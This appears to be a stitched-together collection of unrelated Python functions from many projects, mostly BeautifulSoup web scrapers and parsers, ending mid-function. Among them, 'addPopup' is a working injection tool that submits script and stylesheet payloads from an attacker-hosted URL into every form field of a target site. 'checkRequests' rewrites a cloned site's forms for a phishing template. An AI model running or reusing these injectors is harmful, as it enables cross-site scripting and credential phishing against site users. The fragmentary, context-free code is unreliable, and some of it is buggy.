def main():
    href = 'https://tw.stock.yahoo.com/q/q?s=2412'
    page = urlopen(href)
    '''
    try:
        href = 'https://tw.stock.yahoo.com/q/q?s=2412'
        session = requests.Session()
        s_time = time.time()
        page = urlopen(href)
        e_time = time.time()
        print(str(e_time - s_time) + ' was spent to get a page.')
    except requests.exceptions.HTTPError:
        return None
    '''
    soup = BeautifulSoup(page)
    # print(soup.prettify())  # using BeautifulSoup 3
    if soup is None:
        print('soup is none')
    # align="center" bgcolor="#FFFfff" nowrap
    head = []
    for th in soup.find_all(['th'], width='55'):
        head.append(th.text)
    value = []
    for td in soup.find_all(['td'], bgcolor='#FFFfff'):
        value.append(td.text)
    for i in range(0, len(head)):
        print(head[i] + ' ' + value[i].rstrip())
    # /logos/doodles/2014/world-cup-2014-42-4675815216250880-hp.gif
def word_parser(word_link):
    opener = urllib2.build_opener()
    opener.addheaders = [("User-agent", "Mozilla/5.0")]
    word_page = opener.open(word_link)
    word_soup = BeautifulSoup(word_page)
    the_word = re.sub('http://thesaurus.com/browse/', '', str(word_link))
    word_check = the_word
    word_check_class = None
    word_extract = "Start"
    while word_extract != None:
        word_extract = re.search(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL),
                                 str(word_soup)).group()
        word_extract_soup = BeautifulSoup(word_extract)
        for link in word_extract_soup.find_all("a", "nud"):
            word_check = link.get_text()
        if word_check != the_word:
            break
        word_check_class = word_extract_soup.find_all("div", "adjHdg")
        if str(word_check_class) != "[]":
            break
        parser_core(word_extract)
        word_soup = re.sub(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL),
                           '\n', str(word_soup), 1)
        word_extract_none = re.search(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL),
                                      str(word_soup))
        if word_extract_none == None:
            break
def search(self, terms):
    torrents = []
    p = []
    if terms.find(' '):
        p = terms.split(' ')
    else:
        p.append(terms)
    self.urlTemp = self.url
    if p[0] == "series" or p[0] == "films":
        if p[0] == "series":
            self.urlTemp += "/torrents_series.html"
        if p[0] == "films":
            self.urlTemp += "/torrents_films.html"
        if len(p) > 1:
            self.urlTemp += ",page-" + str(int(int(p[1]) - 1))
    else:
        search = self.clean(terms)
        search = search + ".html"
        self.urlTemp += self.path + search
    try:
        f = requests.get(self.urlTemp, cookies=self.tokens, headers=self.headers)
    except:
        self.initializeScraper()
        try:
            f = requests.get(self.urlTemp, cookies=self.tokens, headers=self.headers)
        except:
            if (f.status_code != requests.codes.ok):
                f.raise_for_status()
            raise Exception('something wrong')
    response = f.text
    if self.error in response:
        # raise Exception("no torrent")
        return torrents
    else:
        soup = BeautifulSoup(response, 'html.parser')
        tds = soup.find_all("td")
        for td in tds:
            if td.i != None:
                if "fa" in td.i.get("class"):
                    attributs = td.parent.find_all("td")
                    f2 = requests.get(td.a['href'], cookies=self.tokens, headers=self.headers)
                    soup = BeautifulSoup(f2.text, 'html.parser')
                    dl = soup.find_all('a', {'class': "btn btn-danger download"})
                    torrents.append({
                        'url': self.url + dl[1]['href'],
                        'name': td.a.text.encode('utf-8'),
                        'seeds': int(attributs[2].text),
                        'leechers': int(attributs[3].text),
                    })
        return torrents
def getTrack(content):
    selected_track = None
    sleep(0.5)
    request_content_page = requests.get(tunefind_search_uri + content['uri'], headers)
    soup = BeautifulSoup(request_content_page.text, 'html.parser')
    all_tracks = soup.find_all(
        class_='AppearanceRow__container___XH3q9'
    ) if content['type'] == 'artist' else soup.find_all(
        class_='SongRow__container___3eT_L')
    if not len(all_tracks):
        print("We couldn't find any songs for this %s" % (content['type']))
        return
    minEntryIndex = int(min(range(len(all_tracks))) + 1)
    maxEntryIndex = int(max(range(len(all_tracks))) + 1)
    if minEntryIndex == maxEntryIndex:
        playback_link = extractMediaLink(all_tracks[0])
        openLink(playback_link)
        return
    for index, track_single in enumerate(all_tracks):
        song_title = track_single.find(
            class_='AppearanceRow__songInfoTitle___3nWel'
        ) if content['type'] == 'artist' else track_single.find(
            class_='SongTitle__link___2OQHD')
        print('Title: %s' % (song_title.text))
        print('Index: %d' % (int(index) + 1))
    select_number = input(
        'Please select a number from %d to %d for the track you want: '
        % (minEntryIndex, maxEntryIndex))
    while not select_number:
        select_number = input('Please select a number from %d to %d: '
                              % (minEntryIndex, maxEntryIndex))
    while not int(select_number) >= minEntryIndex:
        select_number = input('Please select a number from %d to %d: '
                              % (minEntryIndex, maxEntryIndex))
    while not int(select_number) <= maxEntryIndex:
        select_number = input('Please select a number from %d to %d: '
                              % (minEntryIndex, maxEntryIndex))
    selected_track = all_tracks[int(select_number) - 1]
    playback_link = extractMediaLink(selected_track)
    openLink(playback_link)
def subcommand_news_find(self, user, dst, args):
    """Queries Google News for the first page of news results for a given keyword.

    Syntax: {0}news find <keyword>
    """
    if not user.admin:
        raise PluginBase.InvalidPermission
    try:
        # TODO: Consider the safety of directly placing user input
        r = requests.get(self.strings.URL_GOOGLE_SEARCH.format(args))
    except requests.ConnectionError:
        self.irch.say(self.strings.CONNECTION_ERROR, dst)
        return
    r.encoding = 'utf-8'
    soup = BeautifulSoup(r.text)
    titles = soup.find_all(class_='r')
    search_set = []
    for tag in titles:
        url = tag.contents[0].attrs['href'].split('=', 1)[1]
        title = tag.text
        parent = tag.parent
        source, timestamp = parent.find(class_='f').text.split(' - ')
        summary = parent.find(class_='st').text
        search_set.append([title, timestamp, source, url, summary])
    if len(search_set) > 0:
        self.news['set'] = NewsSet(name='Search: {0}'.format(args), set_=search_set)
        self.irch.say(self.news['set'].get(), dst)
    else:
        self.irch.say(self.strings.KEYWORD_NOT_FOUND, dst)
def parseHTML(page, output_f):
    array = []
    soup = BeautifulSoup(page, 'html.parser')
    for div in soup.find_all('div', class_=DIV_SELECTOR):
        try:
            event = div.find('div', class_=EVENT_SELECTOR)
            if event:
                elt = {}
                link = event.find('a')
                text = link.get_text()
                if isVisit(text):
                    elt['visit'] = text
                else:
                    elt['query_text'] = text
                elt['link'] = link["href"]
                elt['date'] = event.find('br').get_text()
                meta = div.find('div', class_=META_SELECTOR)
                if meta:
                    elt['meta'] = meta.get_text()
                array.append(elt)
        except:
            print "Failed to parse elt"
    print array
    print output_f
    with open(output_f, 'w') as outfile:
        json.dump(array, outfile)
def getEcNumbers(file):
    handler = open(file).read()
    soup = Soup(handler, 'xml')
    reactions = soup.find_all('reaction')
    ec_numbers = {}
    for reaction in reactions:
        links = reaction.find_all("li")
        BiGG_ID = ""
        EC_number = ""
        for link in links:
            if "identifiers.org/ec-code" in link['resource']:
                EC_number = link['resource'][31:]
            elif "identifiers.org/bigg.reaction" in link['resource']:
                BiGG_ID = reaction['id']
                if 'R_' in BiGG_ID:
                    BiGG_ID = BiGG_ID[2:]
        if EC_number and BiGG_ID:
            # CHANGED: now we just save the EC number, since the names of the
            # enzymes and metabolites were never used for querying Brenda.
            ec_numbers[BiGG_ID] = EC_number
    return ec_numbers
def get_json():
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup

    def get_website_source(url: str) -> str:
        request_headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) ' +
                          'Chrome/35.0.1916.47 Safari/537.36'
        }
        request = urllib.request.Request(url, headers=request_headers)
        with urllib.request.urlopen(request) as response:
            # print(response.read())
            return response.read().decode('utf-8')

    print('Download page ')
    source = get_website_source(
        'http://ftp.ebi.ac.uk/pub/databases/RNAcentral/current_release/json/')
    # print(source)
    parsed_html = BeautifulSoup(source, "lxml")
    names_json = []
    for row in parsed_html.find_all('a'):
        href = row['href']
        if 'ensembl-xref-' in href:
            names_json.append(href)
    return names_json
def gather_html():
    stat_ids = []
    for category in category_labels:
        category_url = category_url_stub % (category)
        page = requests.get(category_url)
        html = BeautifulSoup(page.text.replace('\n', ''), 'html.parser')
        for table in html.find_all("div", class_="table-content"):
            for link in table.find_all("a"):
                stat_ids.append(link['href'].split('.')[1])
    starting_year = 2015  # page in order to see which years we have info for
    for stat_id in stat_ids:
        url = url_stub % (stat_id, starting_year)
        page = requests.get(url)
        html = BeautifulSoup(page.text.replace('\n', ''), 'html.parser')
        stat = html.find("div", class_="parsys mainParsys").find('h3').text
        print stat
        directory = "stats_html/%s" % stat.replace('/', ' ')  # need to replace to avoid
        if not os.path.exists(directory):
            os.makedirs(directory)
        years = []
        for option in html.find("select", class_="statistics-details-select").find_all("option"):
            year = option['value']
            if year not in years:
                years.append(year)
        url_filenames = []
        for year in years:
            url = url_stub % (stat_id, year)
            filename = "%s/%s.html" % (directory, year)
            if not os.path.isfile(filename):  # this check saves time if you've already downloaded the page
                url_filenames.append((url, filename))
        jobs = [gevent.spawn(gather_pages, pair[0], pair[1]) for pair in url_filenames]
        gevent.joinall(jobs)
def get_comment(self, item):
    html = self.__down_load(item, 1)
    # print html
    soup = BeautifulSoup(html)
    if soup:
        for l in soup.find_all(attrs={'class': 'u-con'}):
            print l.string
def olx_parser(home_ids):
    data = []
    page = requests.get(OLX_URL)
    soup = BeautifulSoup(page.text, "lxml")
    tables = soup.find_all('table', attrs={'summary': 'Ogłoszenie'})
    for table in tables:
        id = table.attrs['data-id']
        if id in home_ids:
            continue
        text = ""
        url = ""
        img = ""
        table_body = table.find('tbody')
        rows = table_body.find_all('tr')
        for row in rows:
            cols = row.find_all('td')
            if cols[0].contents[1].name == 'a':
                url = cols[0].contents[1].attrs['href']
                if cols[0].contents[1].contents[1].name == 'img':
                    img = cols[0].contents[1].contents[1].attrs['src']
            cols = [ele.text.rstrip() for ele in cols]
            for col in cols:
                text = text + col.replace("\n", " ") + " "
        while '  ' in text:
            text = text.replace('  ', ' ')
        data.append(Home(table.attrs['data-id'], text, url, img))
    return data
def find_tag(html, tag):
    # parse text
    parsed_html = BeautifulSoup(html)
    tags_all = parsed_html.find_all(tag)
    # find all instances of tag and its weight attribute, if any
    tags = []
    weights = []
    if tags_all:
        for item in tags_all:
            tags.append(item.text.strip())
            if 'weight' in item.attrs:
                weights.append(item['weight'])
    # return results in special cases
    if not tags:
        return '', ''
    elif 'NO CATEGORIES' in tags:
        return 'NO CATEGORIES', ''
    elif len(tags) == 1 and len(weights) == 1:
        return tags[0], weights[0]
    elif len(tags) == 1 and not weights:
        return tags[0], ''
    # return results
    return tags, weights
def extract_tenders_from_web_page_by_url(url):
    html = requests.get(url).text
    parsed_html = BeautifulSoup(html, "html.parser")
    if is_last_page(parsed_html):
        return None
    a = parsed_html.find_all("a", {"class": "shortestProcedures__item"})
    tender_list = []
    for tender in a:
        t = Tender()
        t.link = tender['href']
        t.number = tender.find("div", {
            "class": "shortestProcedures__cell shortestProcedures__cell--number"
        }).get_text()
        t.description = tender.find("div", {
            "class": "shortestProcedures__cell shortestProcedures__cell--description"
        }).get_text()
        t.company = tender.find("span", {
            "class": "shortestProcedures__customerName"
        }).get_text()
        t.date = tender.find("span", {
            "class": "shortestProcedures__date"
        }).get_text()
        t.price = tender.find("span", {
            "class": "shortestProcedures__price shortestProcedures__price--noPrice"
        }).get_text()
        tender_list.append(t)
    return tender_list
def poslaju_info(trackingno):
    _data = {'trackingNo03': trackingno}
    response = requests.post(
        'https://www.pos.com.my/postal-services/quick-access/?track-trace',
        data=_data).text
    if "Please insert the correct Tracking Number.No" in response:
        return None
    regex = re.compile(r'var strTD = "(.*?)</table>";', re.S | re.M)
    table = regex.search(response).group(1)
    soup = BeautifulSoup(table, "lxml")
    rows = soup.find_all("table")[1].find_all("tr")
    data = []
    for row in rows:
        cells = row.find_all("td")
        items = []
        for cell in cells:
            items.append(truncate(cell.text.strip()))
        data.append(items)
    data.pop(0)  # first row has headers
    print(
        tabulate.tabulate(data,
                          headers=["datetime", "details", "location"],
                          tablefmt="simple"))
def parse_table(
        source: str,
        interpret_cells: bool = True) -> Tuple[List[str], List[List[str]]]:
    if interpret_cells:
        for replacement in sub_sup_replacements:
            source = source.replace(replacement, sub_sup_replacements[replacement])
    parsed_html = BeautifulSoup(source, "lxml")
    column_count = None
    header = []
    rows = []
    current_rowspans = []
    for row in parsed_html.find_all('tr'):
        cells = [x for x in row.find_all('td')]
        if len(cells) == 0:
            cells = [x.text.strip() for x in row.find_all('th')]
            column_count = len(cells)
            current_rowspans = [[0, None]] * column_count
            header = cells
        else:
            if column_count is None:
                column_count = len(cells)
                current_rowspans = [[0, None]] * column_count
            for i in range(0, len(current_rowspans)):
                if current_rowspans[i][0] > 0:
                    cells.insert(i, current_rowspans[i][1])
                    current_rowspans[i][0] -= 1
            for i in range(0, len(cells)):
                if 'rowspan' in cells[i].attrs:
                    current_rowspans[i][0] = int(cells[i].attrs['rowspan']) - 1
                    del cells[i].attrs['rowspan']
                    current_rowspans[i][1] = cells[i]
            rows.append([get_cell_contents(x, interpret_cells) for x in cells])
    return header, rows
def lel_info(trackingnumber):
    response = requests.get("https://tracker.lel.asia/tracker?trackingNumber="
                            + trackingnumber
                            + "&lang=en-US")
    soup = BeautifulSoup(response.text, "html.parser")
    trace__date_rows = soup.find_all('div', {'class': 'trace__date_row'})
    data = []
    for trace__date_row in trace__date_rows:
        elem = trace__date_row.find("div", {"class": "trace__date"}).text
        date = " ".join(elem.split())
        trace__items = trace__date_row.find_all('tr', {'class': 'trace__item'})
        for trace__item in trace__items:
            time = trace__item.find('span', {'class': 'trace__time'}).text
            value = trace__item.find('span', {'class': 'trace__event-value'}).text
            data.append([date, time, value])
    t_headers = "Date Time Description".split(" ")
    print(t(data, headers=t_headers))
def getmovielist(html):
    soup = BeautifulSoup(html)
    divs = soup.find_all('ul', {'class': 'mod_list_pic_130'})
    for div_html in divs:
        div_html = str(div_html).replace('\n', '')
        getmovie(div_html)
def pridobiXML(pot):
    # Collect the files in the directory
    datoteke = [f for f in listdir(pot) if isfile(join(pot, f))]
    st = 0
    print("-----" + str(len(datoteke)) + " datotek pridobljenih-----")
    # List of lemmatized articles
    clanki_lem = []
    print("-----Razvrščanje besed v objekte-----")
    # Read the files as UTF-8
    for d in datoteke:
        if (st % 100 == 0):
            print(".", end="")
        fileObj = codecs.open(pot + d, "r", "utf-8")
        soup = BeautifulSoup(fileObj, 'xml')
        words = soup.find_all('w')
        datum = d.split("_")[1:]
        datum[-1] = datum[-1][0:4]
        clanki_lem.append([])
        # Extract the words and store them in the list
        for w in words:
            lb = LematiziranaBeseda(w['lemma'], w['msd'], w.get_text(), datum)
            clanki_lem[st].append(lb)
        st += 1
    return clanki_lem
def querySite(domain):
    print('Now visiting ' + domain)
    sleep(3)
    request_search_page = requests.get(domain, headers=headers)
    soup = BeautifulSoup(request_search_page.text, 'html.parser')
    results = soup.find_all(class_='g')
    if request_search_page.status_code != 200:
        print('Error: The URL you are trying to access is returning a status code of %s'
              % (request_search_page.status_code))
        print('This is the response we got: %s' % (request_search_page.text))
        return
    if not len(results):
        print('We couldn\'t find any pages for this URL: %s' % (domain))
        return
    for result in results:
        url = result.find('a')['href']
        parsed_url = urllib.parse.urlparse(url)
        if len(parsed_url.query) > 0 or parsed_url.query is not None:
            query_params = urllib.parse.parse_qs(parsed_url.query)
            if not isEmpty(query_params) and 'q' in query_params:
                url = urllib.parse.parse_qs(parsed_url.query)['q'][0]
        if len(str(url)) < 1:
            continue
        print('Now crawling ' + url)
        sleep(3)
        meta_title = getMeta('title', url)
        meta_description = getMeta('description', url)
        if url is None:
            url = 'N/A'
        if meta_title is None:
            meta_title = 'N/A'
        if meta_description is None:
            meta_description = 'N/A'
        message = str("URL: %s Title: %s Description: %s") % (url, meta_title, meta_description)
        print(message, file=outfile)
    if soup.find(isNextLink) is None:
        return
    next_step_link = str(google_base_uri + soup.find(isNextLink)['href'])
    if next_step_link is not None:
        querySite(next_step_link)
def function(message):
    news = urllib.request.urlopen(
        'https://ttrcoin.com/article/novosti.12/').read()
    parsed_html = BeautifulSoup(news)
    links = parsed_html.find_all('a', attrs={'class': 'attachHolder'})
    bot.reply_to(
        message,
        "https://ttrcoin.com/article/novosti.12/" + links[1].get('href'))
def parse_xml(output):
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup
    try:
        path = sys.argv[1]
        file = '../{}/bin/Debug/TestResult.xml'
        file = file.format(path)
        xml = open(file)
    except:
        print('Error: Enter a valid file path argument or file not found or inaccessible')
        return -1
    body = []
    soup = BeautifulSoup(xml, 'xml')
    message = ''
    log = ''
    for tag in soup.find_all('test-case'):
        try:
            runName = tag['classname']
            stepName = tag['methodname']
        except:
            runName = tag['fullname']
            stepName = tag['name']
        status = tag['result']
        if tag.find('start-time') is not None and tag.find('end-time') is not None:
            start = tag['start-time']
            startArr = start.split()
            start = startArr[0] + 'T' + startArr[1]
            end = tag['end-time']
            endArr = end.split()
            end = endArr[0] + 'T' + endArr[1]
        else:
            start = None
            end = None
        if status == "Failed":
            status = "FAIL"
        elif status == "Passed":
            status = "PASS"
        else:
            status = "SKIP"
        if status == 'FAIL':
            if tag.find('stack-trace') is not None:
                log = tag.find('stack-trace').text
                log = base64.b64encode(bytes(log, 'utf-8'))
                log = log.decode('utf-8')
            if tag.find('message') is not None:
                message = tag.find('message').text
        else:
            message = ''
            log = ''
        value = create_test_logs_json(runName, stepName, status, message, log, start, end, output)
        body.append(value)
    return body
def run(self):
    while self.CRAWL:
        # print "Waiting for new URL"
        link = self.urlq.get()  # get the Original Link
        try:
            # print "Waiting to fetch data "
            data = urllib2.urlopen(link).read()  # Fetch data from the Original Link with 15 seconds as timeout
        except:
            print "Check Your Internet Connection it has either disconnected or is slow"
            self.urlq.task_done()
            continue
        try:
            soup = BeautifulSoup(data, 'html.parser')
            for atag in soup.find_all('a'):  # Get the list of all links within Original Link
                lnk = atag.get('href')
                if lnk is None:
                    continue
                else:
                    lnk = lnk.encode('utf-8')  # Convert the links to utf encoding
                if lnk in self.UniqueURLs:  # Avoid crawling visited links so that it doesn't go into a loop!
                    continue
                if lnk.startswith('http:') or lnk.startswith('https:'):
                    # print "Normal links " + lnk
                    self.urlq.put(lnk)
                elif lnk.startswith('javascript:'):
                    # Continue loop if the link is a javascript call
                    # print "Javascript call " + lnk
                    continue
                elif lnk.startswith('#'):
                    # Continue loop if the link is a #tag/fragments
                    # print "#tags"
                    continue
                else:
                    # print "Relative links " + urlparse.urljoin(link, lnk)
                    self.urlq.put(urlparse.urljoin(link, lnk) + "")  # convert relative link into absolute link and add to Queue
        except Exception, e:
            print "Exception has occured with this link", e, lnk
        with lock:
            self.UniqueURLs[link] = 1  # Put the visited link into a dictionary so that already crawled links can be avoided
            if len(self.UniqueURLs) < LIMIT:
                self.CRAWL = False  # Set CRAWL to false to stop further crawling
                print self.name + " LIMIT has reached The rest of the unique URLs will be added to the dictionary and saved!"
                while self.urlq.qsize():  # Put the rest of the unique links into the dictionary
                    lnk = self.urlq.get()
                    if lnk in self.UniqueURLs:
                        self.urlq.task_done()
                        continue
                    self.UniqueURLs[lnk] = 1
                    self.urlq.task_done()
        self.urlq.task_done()
def parse_results(report):
    data = open('/root/{}'.format(report))
    structure = str(data.readlines())
    soup = BeautifulSoup(structure, 'html.parser')
    tables1 = str(soup.find_all(class_="table table-bordered table-striped")[1])
    tables2 = str(soup.find_all(class_="table table-bordered table-striped")[2])
    tables3 = str(soup.find_all(class_="table table-bordered table-striped")[3])
    soup1 = BeautifulSoup(tables1, 'html.parser')
    soup2 = BeautifulSoup(tables2, 'html.parser')
    soup3 = BeautifulSoup(tables3, 'html.parser')
    rrd4k_data = soup1.find_all('td')[3].string
    rwd4k_data = soup1.find_all('td')[5].string
    rrd16MiB_data = soup2.find_all('td')[3].string
    rwd16MiB_data = soup2.find_all('td')[5].string
    try:
        rws10ms_data = int(soup3.find_all('td')[3].string)
    except ValueError:
        rws10ms_data = 0
    try:
        rws30ms_data = int(soup3.find_all('td')[5].string)
    except ValueError:
        rws30ms_data = 0
    rws100ms_data = int(soup3.find_all('td')[7].string[2:])
    rrd4k_iops = int(re.findall(r"[\d']+", rrd4k_data)[0])
    rwd4k_iops = int(re.findall(r"[\d']+", rwd4k_data)[0])
    rrd16MiB_bandwidth = int(re.findall(r"[\d']+", rrd16MiB_data)[0])
    rwd16MiB_bandwidth = int(re.findall(r"[\d']+", rwd16MiB_data)[0])
    rrd4k_dev = int(re.findall(r"[\d']+", rrd4k_data)[-1])
    rwd4k_dev = int(re.findall(r"[\d']+", rwd4k_data)[-1])
    rrd16MiB_dev = int(re.findall(r"[\d']+", rrd16MiB_data)[-1])
    rwd16MiB_dev = int(re.findall(r"[\d']+", rwd16MiB_data)[-1])
    return dict({"rws10ms_data": rws10ms_data,
                 "rws30ms_data": rws30ms_data,
                 "rws100ms_data": rws100ms_data,
                 "rrd4k_iops": rrd4k_iops,
                 "rwd4k_iops": rwd4k_iops,
                 "rrd16MiB_bandwidth": rrd16MiB_bandwidth,
                 "rwd16MiB_bandwidth": rwd16MiB_bandwidth,
                 "rrd4k_dev": rrd4k_dev,
                 "rwd4k_dev": rwd4k_dev,
                 "rrd16MiB_dev": rrd16MiB_dev,
                 "rwd16MiB_dev": rwd16MiB_dev})
def decodeWebpage(url):
    r = requests.get(url)
    soup = BeautifulSoup(r.text)
    for story_heading in soup.find_all(class_="story-heading"):
        if story_heading.a:
            print(story_heading.a.text.replace("\n", " ").strip())
        else:
            print(story_heading.contents[0].strip())
def job_fnF():
    url = 'https://www1.nseindia.com/live_market/dynaContent/live_watch/option_chain/optionKeys.jsp?segmentLink=17&instrument=OPTIDX&symbol=NIFTY&date=' + edate
    response = requests.get(url)
    resp = response.content
    soup = BeautifulSoup(resp)
    table1 = soup.find('table')
    niftyrow = []
    for row1 in table1.findAll('b'):
        text1 = row1.text.replace('style', '')
        niftyrow.append(text1)
    niftyval = int(text1[5:10]) + 2
    callstrk = int(round(niftyval, -2)) + 300
    putstrk = callstrk - 700
    callstring = "%d.00" % callstrk
    for row1 in soup.find_all('tr'):
        cells = row1.find_all('td')
        for cell in cells:
            value = cell.string
            if value == callstring:
                celln = 0
                for cell in cells:
                    celln = celln + 1
                    value = cell.string
                    if celln == 10:
                        CallPrice = value
                        # print CallPrice
    putstring = "%d.00" % putstrk
    for row1 in soup.find_all('tr'):
        cells = row1.find_all('td')
        for cell in cells:
            value = cell.string
            if value == putstring:
                celln = 0
                for cell in cells:
                    celln = celln + 1
                    value = cell.string
                    if celln == 14:
                        PutPrice = value
                        # print PutPrice
    indtime = datetime.now() + timedelta(hours=5, minutes=30)
    ddtime = '{:%D:%H:%M:%S}'.format(indtime)
    # print "Nifty", niftyval, "Calls", callstrk, "Puts", putstrk, datetime.now(), PutPrice, OpenNifty
    msg = "New: Sell Calls %d , Puts %d , Thanks! " % (callstrk, putstrk)
    check_output(["yowsup-cli", "demos", "-M", "-c", "config", "-s", "*****@*****.**", "F%s" % msg])
    check_output(["yowsup-cli", "demos", "-M", "-c", "config", "-s", "*****@*****.**", "F%s" % msg])
def get_links(search_name):
    search_name = search_name.replace(' ', '+')
    url = url_base.format(search_name, 0)
    request = ulib.Request(url, None, headers)
    json_string = ulib.urlopen(request).read()
    page = json.loads(json_string)
    new_soup = Soup(page[1][1], 'lxml')
    images = new_soup.find_all('img')
    links = [image['src'] for image in images]
    return links
def get_page_words(pdf_file):
    delete_words = [
        '"', ':', ';', '!', '@', '#', '$', '%', '^', '&', '0', '1', '2', '3',
        '4', '5', '6', '7', '8', '9', '*', '(', ')', '+', '-', '_', '=', '{',
        '}', '[', ']', '?', '/', '<', '>', ',', '.', '|', '`', '~', '"', "'", '\\'
    ]
    contents = convert_pdf_to_html(pdf_file)
    # with open(pdf_file) as f:
    #     for line in f.readlines():
    #         contents += line
    contents = contents.replace("\n", "")
    contents = contents.replace("\r", "")
    # contents = contents.rstrip()
    pages = contents.split("<a name=")[1:]
    all_pages = []
    for i in range(len(pages)):
        page_html = BeautifulSoup(pages[i], "html.parser")
        divs = page_html.find_all('div')
        spans = []
        for div in divs:
            spans += div.find_all('span')
        word_list = []
        for span in spans:
            text = span.text.lower()
            text = text.replace("\\n", " ")
            text = text.replace("\\r", " ")
            fin = False
            while not fin:
                if text.find("\\xe") >= 0:
                    idx = text.find("\\xe")
                    text = text.replace(text[idx:idx + 12], "")
                else:
                    fin = True
            for dw in delete_words:
                text = text.replace(dw, " ")
            words = text.split()
            style = span['style']
            bold = ",Bold" in style
            size = style[style.find("font-size:") + 10:-2]
            for word in words:
                if len(word) == 1:
                    continue
                if word != "":
                    word_list.append([word, size, bold])
        all_pages.append(word_list)
    return all_pages

# print(get_page_words("Lec01_note.pdf")[3])
def addPopup(self, url):  # (self, url, payload)
    self.url = url
    source = urllib.urlopen(self.url)
    soup = BeautifulSoup(source.read())
    print ">>> Reading Source...\n\n"
    for form in soup.find_all("form"):
        inputs_submit = []
        inputs_field = []
        # form_action.append(form.get("action"))  # Get URI to will send
        print ">>> Searching field vulnerabilities...\n\n"
        for inputs in form.find_all("input"):
            if inputs.get("type") == "submit":
                inputs_submit.append(inputs.get("name"))
                inputs_submit.append(inputs.get("value"))
            elif inputs.get("type") != "submit":
                inputs_field.append(inputs.get("name"))
            else:
                print "Not found any field vulnerability :(\n\n"
        for textarea in form.find_all("textarea"):
            inputs_field.append(textarea.get("textarea"))
        vectorJS = {}
        path_archive1 = "core/css.js"
        if os.path.isfile(path_archive1) == True:
            for field in inputs_field:
                vectorJS[field] = """<script src="http://localhost/GSoC/css.js"></script>"""
            vectorJS[inputs_submit[0]] = inputs_submit[1]
            send_vector = urllib.urlencode(vectorJS)
            print ">>> Vector .js attack...!\n\n"
            print send_vector
            print "-" * 75
            parts = urlparse.urlsplit(self.url)
            a = ''
            for i in parts.path.split("/")[0:-1]:
                a += i + "/"
            send_url = parts.scheme + "://" + parts.netloc + a + form.get("action").split("../")[-1]
            b = ''
            for j in parts.path.split("/")[0:-2]:
                b += j + "/"
            send_url2 = parts.scheme + "://" + parts.netloc + b + form.get("action").split("../")[-1]
            urllib.urlopen(send_url, send_vector)
            urllib.urlopen(send_url2, send_vector)  # Because some pages used '../send.php' to send a request
        vectorCSS = {}
        path_archive2 = "core/injection.css"
        if os.path.isfile(path_archive2) == True:
            for field in inputs_field:
                vectorCSS[field] = """<link rel="stylesheet" href="http://localhost/GSoC/injection.css"/>"""
            vectorCSS[inputs_submit[0]] = inputs_submit[1]
            send_vector2 = urllib.urlencode(vectorCSS)
            print ">>> Vector .css attack...!\n\n"
            print send_vector2
            print "-" * 75
            urllib.urlopen(send_url, send_vector2)
            urllib.urlopen(send_url2, send_vector2)
def alphabetical_parser(alphabetical_link):
    opener = urllib2.build_opener()
    opener.addheaders = [("User-agent", "Mozilla/5.0")]
    alphabetical_page = opener.open(alphabetical_link)
    alphabetical_soup = BeautifulSoup(alphabetical_page)
    for link in alphabetical_soup.find_all("a", "result_link"):
        section_link = link.get("href")
        section_parser(section_link)
def parseTextFromHtml(html):
    text = ""
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup
    soup = BeautifulSoup(html, "lxml")
    allResult = soup.find_all("div", class_="_3-96 _2let")
    for item in allResult:
        text += item.text + "\n"
    return text
def getURL(msg):
    """
    :param page: html of web page (here: Python home page)
    :return: urls in that page
    """
    soup = BeautifulSoup(msg)
    links = soup.find_all('a')
    for tag in links:
        link = tag.get('href', None)
        if link != None:
            print link
def get_recipes_from_page(page_num):
    res = requests.get(BASE_URL + "/recipes/?page=" + str(page_num))
    res_html = BeautifulSoup(res.text, "html.parser")
    recipes_list = []
    article_tags = res_html.find_all("article")
    for i in article_tags:
        try:
            if i.find("a")["href"].startswith("/recipe/"):
                recipes_list.append(i.find("a")["href"])
        except (KeyError, TypeError):
            pass
    return recipes_list
def section_parser(section_link):
    opener = urllib2.build_opener()
    opener.addheaders = [("User-agent", "Mozilla/5.0")]
    section_page = opener.open(section_link)
    section_soup = BeautifulSoup(section_page)
    for link in section_soup.find_all("a", "result_link"):
        word_link = link.get("href")
        text_file.write("%s" % word_link)
        text_file.write("\n")
        word_parser(word_link)
def checkRequests(self, siteName):
    try:
        html = urlopen(siteName).read()
        request = BeautifulSoup(html)
        try:
            for tag in request.find_all('form'):
                tag['method'], tag['action'] = 'post', ''
        except Exception:
            pass
        self.CheckHookInjection(request, 'Templates/Phishing/web_server/index.html')
    except URLError:
        QMessageBox.warning(self, 'Request HTTP', 'It seems like the server is down.')
        return False
    return True
def parse_html():
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup
    filename = 'temp.html'
    html = open(filename, "r").read()
    parsed_html = BeautifulSoup(html, "lxml")
    links = parsed_html.find_all("a")
    for link in links:
        print(str(link.text) + " Pattern," + ",https://en.wikipedia.org" + str(link.get("href")) + ",Wikipedia")
def scraping(cve):
    parsers = ['html.parser']
    r = requests.get('https://nvd.nist.gov/vuln/detail/' + cve)
    soup = BeautifulSoup(r.content, "lxml")
    i = 0
    critical = ""
    size = len(soup.find_all('p'))
    description = soup.find_all('p')[24].text
    crit = soup.find_all('p')[27].text
    i = 0
    more = []
    for line in crit.splitlines():
        if i == 4:
            critical = line
        i = i + 1
    if critical.startswith("N") == True:
        critical = "N/A"
    return description, critical
def genius_scrape_url(url, title):
    proxy = urllib.request.getproxies()
    r = requests.get(url, timeout=10, proxies=proxy)
    try:
        document = BeautifulSoup(r.text, 'html.parser')
        # Genius seems to be returning two types of content
        # One has a 'lyrics' div, the other has Lyrics__Container
        lyrics_div = document.find('div', class_='lyrics')
        if lyrics_div:
            lyrics_paragraphs = []
            [lyrics_paragraphs.append(elem.get_text()) for elem in lyrics_div.find_all('p')]
            lyrics = ''.join(lyrics_paragraphs)
            return LYRICS_TUPLE(lyrics.strip(), url)
        lyrics_containers = document.find_all(
            'div', class_=re.compile('Lyrics__Container*'))
